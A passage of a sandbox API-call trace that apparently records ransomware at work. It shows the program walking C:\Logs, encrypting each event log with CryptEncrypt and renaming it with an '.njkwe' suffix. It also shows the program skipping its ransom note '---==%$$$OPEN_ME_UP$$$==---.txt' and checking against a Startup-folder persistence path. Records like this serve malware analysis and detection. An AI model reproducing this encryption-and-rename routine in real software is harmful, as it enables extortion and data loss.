returned 0xc42eb8 [0065.801] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.803] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.803] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.803] GetProcessHeap () returned 0xbe0000 [0065.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.803] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.803] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.804] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.804] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.804] CloseHandle (hObject=0x428) returned 1 [0065.806] GetProcessHeap () returned 0xbe0000 [0065.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.806] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx_r00t_{3sXlE5}.njkwe") returned 88 [0065.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.806] GetProcessHeap () returned 0xbe0000 [0065.806] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.806] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0065.807] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="Windows") returned -1 [0065.807] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0065.807] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="System Volume Information") returned -1 [0065.807] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="Program Files") returned -1 [0065.807] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0065.807] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 58 [0065.807] StrStrIW (lpFirst="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0065.807] lstrcmpW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.807] lstrcmpW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="taridd") returned -1 [0065.807] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.807] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.807] GetTickCount () returned 0x1150da8 [0065.807] GetTickCount () returned 0x1150da8 [0065.807] GetTickCount () returned 0x1150da8 [0065.807] GetTickCount () returned 0x1150da8 [0065.807] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.807] GetProcessHeap () returned 0xbe0000 [0065.807] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.807] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.809] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.809] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.809] GetProcessHeap () returned 0xbe0000 [0065.809] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.809] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.810] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.810] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.810] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.810] CloseHandle (hObject=0x428) returned 1 [0065.812] GetProcessHeap () returned 0xbe0000 [0065.812] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.812] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 78 [0065.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.812] GetProcessHeap () returned 0xbe0000 [0065.812] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.812] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0065.812] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="Windows") returned -1 [0065.812] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0065.812] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="System Volume Information") returned -1 [0065.812] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="Program Files") returned -1 [0065.812] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0065.812] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 54 [0065.812] StrStrIW (lpFirst="Microsoft-Windows-AppReadiness%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0065.812] lstrcmpW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.812] lstrcmpW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="taridd") returned -1 [0065.812] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.812] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.813] GetTickCount () returned 0x1150da8 [0065.813] GetTickCount () returned 0x1150da8 [0065.813] GetTickCount () returned 0x1150da8 [0065.813] GetTickCount () returned 0x1150da8 [0065.813] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.813] GetProcessHeap () returned 0xbe0000 [0065.813] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.813] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.815] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.815] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.815] GetProcessHeap () returned 0xbe0000 [0065.815] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.815] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.815] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.815] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.815] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.815] CloseHandle (hObject=0x428) returned 1 [0065.817] GetProcessHeap () returned 0xbe0000 [0065.817] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.817] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0065.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.818] GetProcessHeap () returned 0xbe0000 [0065.818] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.818] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0065.818] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="Windows") returned -1 [0065.818] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0065.818] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="System Volume Information") returned -1 [0065.818] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="Program Files") returned -1 [0065.818] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0065.818] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 60 [0065.818] StrStrIW (lpFirst="Microsoft-Windows-AppReadiness%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0065.818] lstrcmpW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.818] lstrcmpW (lpString1="Microsoft-Windows-AppReadiness%4Operational.evtx", lpString2="taridd") returned -1 [0065.818] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.818] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.820] GetTickCount () returned 0x1150da8 [0065.820] GetTickCount () returned 0x1150da8 [0065.820] GetTickCount () returned 0x1150da8 [0065.820] GetTickCount () returned 0x1150da8 [0065.820] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.820] GetProcessHeap () returned 0xbe0000 [0065.820] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.820] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.837] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.837] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.837] GetProcessHeap () returned 0xbe0000 [0065.838] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.838] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.838] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.840] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.840] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.840] CloseHandle (hObject=0x428) returned 1 [0065.867] GetProcessHeap () returned 0xbe0000 [0065.867] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.867] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0065.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.867] GetProcessHeap () returned 0xbe0000 [0065.867] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.867] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0065.867] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="Windows") returned -1 [0065.867] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0065.867] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="System Volume Information") returned -1 [0065.868] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="Program Files") returned -1 [0065.868] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0065.868] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 62 [0065.868] StrStrIW (lpFirst="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0065.868] lstrcmpW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.868] lstrcmpW (lpString1="Microsoft-Windows-AppXDeployment%4Operational.evtx", lpString2="taridd") returned -1 [0065.868] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.868] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.868] GetTickCount () returned 0x1150de7 [0065.868] GetTickCount () returned 0x1150de7 [0065.868] GetTickCount () returned 0x1150de7 [0065.868] GetTickCount () returned 0x1150de7 [0065.869] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.869] GetProcessHeap () returned 0xbe0000 [0065.869] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.869] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.871] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.871] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.871] GetProcessHeap () returned 0xbe0000 [0065.871] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.871] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.871] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.871] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.872] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.872] CloseHandle (hObject=0x428) returned 1 [0065.873] GetProcessHeap () returned 0xbe0000 [0065.873] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.873] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 82 [0065.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0065.874] GetProcessHeap () returned 0xbe0000 [0065.874] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.874] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0065.874] lstrcmpiW 